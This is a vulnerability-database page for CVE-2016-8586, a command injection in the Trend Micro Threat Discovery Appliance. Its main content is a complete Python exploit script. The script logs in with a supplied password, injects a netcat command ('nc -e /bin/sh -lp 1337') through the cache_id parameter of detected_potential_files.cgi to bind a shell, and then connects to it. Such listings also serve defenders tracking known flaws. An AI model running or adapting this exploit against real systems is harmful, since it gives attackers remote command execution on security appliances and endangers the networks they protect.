Vulners
Lucene search
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 detected_potential_files.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8586)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Trend Micro Threat Discovery Appliance 2.6.1062r1 detected_potential_files.cgi Remote Code Execution | 20 Apr 201700:00 | – | zdt |
 | Trend Micro Threat Discovery Appliance Arbitrary Code Execution Vulnerability (CNVD-2017-06838) | 3 May 201700:00 | – | cnvd |
 | CVE-2016-8586 | 28 Apr 201719:00 | – | cve |
 | CVE-2016-8586 | 28 Apr 201719:00 | – | cvelist |
 | EUVD-2016-9433 | 7 Oct 202500:30 | – | euvd |
 | CVE-2016-8586 | 28 Apr 201719:59 | – | nvd |
 | CVE-2016-8586 | 28 Apr 201719:59 | – | osv |
 | Trend Micro Threat Discovery Appliance 2.6.1062r1 detected_potential_files.cgi Remote Code Execution | 20 Apr 201700:00 | – | packetstorm |
 | Code injection | 28 Apr 201719:59 | – | prion |
 | Trend Micro Threat Discovery Appliance - Session Generation Authentication Bypass (CVE-2016-8584) | 20 Apr 201700:00 | – | seebug |
10
import re
import os
import sys
import time
import requests
import threading
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 3:
print "(+) usage: %s <target> <pass>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
p = sys.argv[2]
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
e_url = "%scgi-bin/detected_potential_files.cgi" % bu
s = requests.Session()
def exec_bd(s, e_url):
# now we setup our backdoor
# no reverse, since it seems to fail !?
netcat = "|`nc -e /bin/sh -lp 1337`"
e_url += "?act=search&cache_id=%s" % netcat
s.get(e_url, verify=False, proxies={"http":"https://127.0.0.1:8081/"})
# first we login...
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
print "(+) logged in..."
thread = threading.Thread(target=exec_bd, args=(s, e_url,))
thread.start()
print "(+) starting backdoor, this will take a few secs..."
time.sleep(4)
print "(+) calling backdoor!"
os.system("nc %s 1337" % t)
else:
print "(-) login failed"
sys.exit(-1)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Apr 2017 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.03311